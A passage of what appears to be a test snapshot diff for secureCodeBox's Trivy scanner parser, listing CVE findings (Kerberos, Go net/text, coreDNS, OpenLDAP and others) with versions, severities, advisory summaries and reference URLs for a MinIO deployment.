"https://linux.oracle.com/errata/ELSA-2023-12104.html", + "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "https://security.netapp.com/advisory/ntap-20230216-0008/", + "https://security.netapp.com/advisory/ntap-20230223-0001/", + "https://ubuntu.com/security/notices/USN-5800-1", + "https://ubuntu.com/security/notices/USN-5822-1", + "https://ubuntu.com/security/notices/USN-5822-2", + "https://ubuntu.com/security/notices/USN-5828-1", + "https://ubuntu.com/security/notices/USN-5936-1", + "https://web.mit.edu/kerberos/advisories/", + "https://web.mit.edu/kerberos/krb5-1.19/", + "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "https://www.samba.org/samba/security/CVE-2022-42898.html", ], }, "category": "Vulnerability", - "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", + "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "avoid quadratic complexity in HPACK decoding", + "name": "integer overflow vulnerabilities in PAC parsing", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41723", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41723", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - }, - { - "type": "URL", - "value": "https://go.dev/cl/468135", + "value": "https://avd.aquasec.com/nvd/cve-2022-42898", }, { "type": "URL", - "value": "https://go.dev/cl/468295", + "value": "https://access.redhat.com/errata/RHSA-2022:8637", }, { "type": "URL", - "value": "https://go.dev/issue/57855", + "value": "https://access.redhat.com/security/cve/CVE-2022-42898", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "value": "https://bugzilla.redhat.com/2140960", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "value": "https://errata.rockylinux.org/RLSA-2022:8637", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1571", + "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", }, { "type": "URL", - "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.4.0", - "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41717", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:2367", - "https://access.redhat.com/security/cve/CVE-2022-41717", - "https://bugzilla.redhat.com/2092793", - "https://bugzilla.redhat.com/2161274", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", - "https://errata.almalinux.org/9/ALSA-2023-2367.html", - "https://github.com/advisories/GHSA-xrjj-mj9h-534m", - "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", - "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", - "https://go.dev/cl/455635", - "https://go.dev/cl/455717", - "https://go.dev/issue/56350", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-41717.html", - "https://linux.oracle.com/errata/ELSA-2023-2866.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", - "https://pkg.go.dev/vuln/GO-2022-1144", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-41717", - ], - }, - "category": "Vulnerability", - "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "excessive memory growth in a Go server accepting HTTP/2 requests", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41717", + "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2367", + "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41717", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2092793", + "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "value": "https://ubuntu.com/security/notices/USN-5800-1", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "value": "https://ubuntu.com/security/notices/USN-5822-1", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "value": "https://ubuntu.com/security/notices/USN-5822-2", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "value": "https://ubuntu.com/security/notices/USN-5828-1", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "value": "https://ubuntu.com/security/notices/USN-5936-1", }, { "type": "URL", - "value": "https://go.dev/cl/455635", + "value": "https://web.mit.edu/kerberos/advisories/", }, { "type": "URL", - "value": "https://go.dev/cl/455717", + "value": "https://web.mit.edu/kerberos/krb5-1.19/", }, { "type": "URL", - "value": "https://go.dev/issue/56350", + "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-5709", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libkrb5-3", + "references": [ + "https://access.redhat.com/security/cve/CVE-2018-5709", + "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "https://www.cve.org/CVERecord?id=CVE-2018-5709", + ], + }, + "category": "Vulnerability", + "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", + "value": "https://avd.aquasec.com/nvd/cve-2018-5709", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "value": "https://access.redhat.com/security/cve/CVE-2018-5709", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1144", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.3.8", - "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-32149", - "installedVersion": "v0.3.7", - "packageName": "golang.org/x/text", + "fixedVersion": "1.18.3-6+deb11u3", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-42898", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libkrb5support0", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-32149", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", - "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", - "https://github.com/golang/go/issues/56152", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", - "https://go.dev/cl/442235", - "https://go.dev/issue/56152", - "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", - "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", - "https://pkg.go.dev/vuln/GO-2022-1059", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "https://access.redhat.com/errata/RHSA-2022:8637", + "https://access.redhat.com/security/cve/CVE-2022-42898", + "https://bugzilla.redhat.com/2140960", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "https://errata.rockylinux.org/RLSA-2022:8637", + "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "https://linux.oracle.com/cve/CVE-2022-42898.html", + "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "https://security.netapp.com/advisory/ntap-20230216-0008/", + "https://security.netapp.com/advisory/ntap-20230223-0001/", + "https://ubuntu.com/security/notices/USN-5800-1", + "https://ubuntu.com/security/notices/USN-5822-1", + "https://ubuntu.com/security/notices/USN-5822-2", + "https://ubuntu.com/security/notices/USN-5828-1", + "https://ubuntu.com/security/notices/USN-5936-1", + "https://web.mit.edu/kerberos/advisories/", + "https://web.mit.edu/kerberos/krb5-1.19/", + "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "https://www.samba.org/samba/security/CVE-2022-42898.html", ], }, "category": "Vulnerability", - "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", + "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "ParseAcceptLanguage takes a long time to parse complex tags", + "name": "integer overflow vulnerabilities in PAC parsing", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32149", + "value": "https://avd.aquasec.com/nvd/cve-2022-42898", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32149", + "value": "https://access.redhat.com/errata/RHSA-2022:8637", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "value": "https://access.redhat.com/security/cve/CVE-2022-42898", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "value": "https://bugzilla.redhat.com/2140960", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/56152", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", }, { "type": "URL", - "value": "https://go.dev/cl/442235", + "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", }, { "type": "URL", - "value": "https://go.dev/issue/56152", + "value": "https://errata.rockylinux.org/RLSA-2022:8637", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1059", + "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-2835", - "installedVersion": "v1.9.3", - "packageName": "github.com/coredns/coredns", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-2835", - "https://bugzilla.redhat.com/show_bug.cgi?id=2118542", - "https://github.com/advisories/GHSA-ch7v-37xg-75ph", - "https://nvd.nist.gov/vuln/detail/CVE-2022-2835", - "https://www.cve.org/CVERecord?id=CVE-2022-2835", - ], - }, - "category": "Vulnerability", - "description": "A flaw was found in coreDNS. This flaw allows a malicious user to reroute internal calls to some internal services that were accessed by the FQDN in a format of ..svc.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "coreDNS: DNS Redirection of Internal Services", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-2835", + "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-2835", + "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2118542", + "value": "https://ubuntu.com/security/notices/USN-5800-1", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-ch7v-37xg-75ph", + "value": "https://ubuntu.com/security/notices/USN-5822-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2835", + "value": "https://ubuntu.com/security/notices/USN-5822-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-2835", + "value": "https://ubuntu.com/security/notices/USN-5828-1", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-2837", - "installedVersion": "v1.9.3", - "packageName": "github.com/coredns/coredns", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-2837", - "https://bugzilla.redhat.com/show_bug.cgi?id=2118543", - "https://github.com/advisories/GHSA-h828-v5pv-33qx", - "https://nvd.nist.gov/vuln/detail/CVE-2022-2837", - "https://www.cve.org/CVERecord?id=CVE-2022-2837", - ], - }, - "category": "Vulnerability", - "description": "A flaw was found in coreDNS. This flaw allows a malicious user to redirect traffic intended for external top-level domains (TLD) to a pod they control by creating projects and namespaces that match the TLD.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "DNS Redirection of Top-Level Domains", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-2837", + "value": "https://ubuntu.com/security/notices/USN-5936-1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-2837", + "value": "https://web.mit.edu/kerberos/advisories/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2118543", + "value": "https://web.mit.edu/kerberos/krb5-1.19/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-h828-v5pv-33qx", + "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2837", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-2837", + "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.2.26", - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "GHSA-rm8v-mxj3-5rmq", - "installedVersion": "v1.2.19", - "packageName": "github.com/lestrrat-go/jwx", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-5709", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libkrb5support0", "references": [ - "https://github.com/advisories/GHSA-rm8v-mxj3-5rmq", - "https://github.com/lestrrat-go/jwx/blob/796b2a9101cf7e7cb66455e4d97f3c158ee10904/jwe/internal/aescbc/aescbc.go#L33-L66", - "https://github.com/lestrrat-go/jwx/blob/8840ffd4afc5839f591ff0e9ba9034af52b1643e/jwe/internal/aescbc/aescbc.go#L210-L213", - "https://github.com/lestrrat-go/jwx/commit/6c41e3822485fc7e11dd70b4b0524b075d66b103", - "https://github.com/lestrrat-go/jwx/commit/d9ddbc8e5009cfdd8c28413390b67afa7f576dd6", - "https://github.com/lestrrat-go/jwx/security/advisories/GHSA-rm8v-mxj3-5rmq", + "https://access.redhat.com/security/cve/CVE-2018-5709", + "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "https://www.cve.org/CVERecord?id=CVE-2018-5709", ], }, "category": "Vulnerability", - "description": "AES-CBC decryption is vulnerable to a timing attack which may permit an attacker to recover the plaintext of JWE data.", + "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "github.com/lestrrat-go/jwx vulnerable to Potential Padding Oracle Attack", + "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", "references": [ { "type": "URL", - "value": "https://github.com/advisories/GHSA-rm8v-mxj3-5rmq", + "value": "https://avd.aquasec.com/nvd/cve-2018-5709", }, { "type": "URL", - "value": "https://github.com/lestrrat-go/jwx/blob/796b2a9101cf7e7cb66455e4d97f3c158ee10904/jwe/internal/aescbc/aescbc.go#L33-L66", + "value": "https://access.redhat.com/security/cve/CVE-2018-5709", }, { "type": "URL", - "value": "https://github.com/lestrrat-go/jwx/blob/8840ffd4afc5839f591ff0e9ba9034af52b1643e/jwe/internal/aescbc/aescbc.go#L210-L213", + "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", }, { "type": "URL", - "value": "https://github.com/lestrrat-go/jwx/commit/6c41e3822485fc7e11dd70b4b0524b075d66b103", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://github.com/lestrrat-go/jwx/commit/d9ddbc8e5009cfdd8c28413390b67afa7f576dd6", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", }, { "type": "URL", - "value": "https://github.com/lestrrat-go/jwx/security/advisories/GHSA-rm8v-mxj3-5rmq", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.28.0", - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2023-33955", - "installedVersion": "v0.20.0", - "packageName": "github.com/minio/console", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-2953", + "installedVersion": "2.4.57+dfsg-3+deb11u1", + "packageName": "libldap-2.4-2", "references": [ - "https://github.com/advisories/GHSA-jv3f-7m33-qp65", - "https://github.com/minio/console/commit/17e791afb90c9ad27c65f63c6be14f2f6a3a9d60", - "https://github.com/minio/console/releases/tag/v0.28.0", - "https://github.com/minio/console/security/advisories/GHSA-jv3f-7m33-qp65", - "https://nvd.nist.gov/vuln/detail/CVE-2023-33955", + "https://access.redhat.com/security/cve/CVE-2023-2953", + "https://bugs.openldap.org/show_bug.cgi?id=9904", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2953", + "https://nvd.nist.gov/vuln/detail/CVE-2023-2953", + "https://www.cve.org/CVERecord?id=CVE-2023-2953", ], }, "category": "Vulnerability", - "description": "Minio Console is the UI for MinIO Object Storage. Unicode RIGHT-TO-LEFT OVERRIDE characters can be used to mask the original filename. This issue has been patched in version 0.28.0. - -", + "description": "A vulnerability was found in openldap. This security flaw causes a null pointer dereference in ber_memalloc_x() function.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "Minio console object names with RIGHT-TO-LEFT OVERRIDE unicode character can be exploited", + "name": "null pointer dereference in ber_memalloc_x function", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-33955", + "value": "https://avd.aquasec.com/nvd/cve-2023-2953", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-jv3f-7m33-qp65", + "value": "https://access.redhat.com/security/cve/CVE-2023-2953", }, { "type": "URL", - "value": "https://github.com/minio/console/commit/17e791afb90c9ad27c65f63c6be14f2f6a3a9d60", + "value": "https://bugs.openldap.org/show_bug.cgi?id=9904", }, { "type": "URL", - "value": "https://github.com/minio/console/releases/tag/v0.28.0", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2953", }, { "type": "URL", - "value": "https://github.com/minio/console/security/advisories/GHSA-jv3f-7m33-qp65", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2953", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-33955", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-2953", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27664", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2015-3276", + "installedVersion": "2.4.57+dfsg-3+deb11u1", + "packageName": "libldap-2.4-2", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2357", - "https://access.redhat.com/security/cve/CVE-2022-27664", - "https://bugzilla.redhat.com/2107371", - "https://bugzilla.redhat.com/2107374", - "https://bugzilla.redhat.com/2107383", - "https://bugzilla.redhat.com/2107386", - "https://bugzilla.redhat.com/2107388", - "https://bugzilla.redhat.com/2113814", - "https://bugzilla.redhat.com/2124669", - "https://bugzilla.redhat.com/2132868", - "https://bugzilla.redhat.com/2132872", - "https://bugzilla.redhat.com/2161274", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", - "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", - "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", - "https://errata.almalinux.org/9/ALSA-2023-2357.html", - "https://errata.rockylinux.org/RLSA-2022:7129", - "https://github.com/advisories/GHSA-69cg-p879-7622", - "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", - "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", - "https://github.com/golang/go/issues/54658", - "https://go.dev/cl/428735", - "https://go.dev/issue/54658", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", - 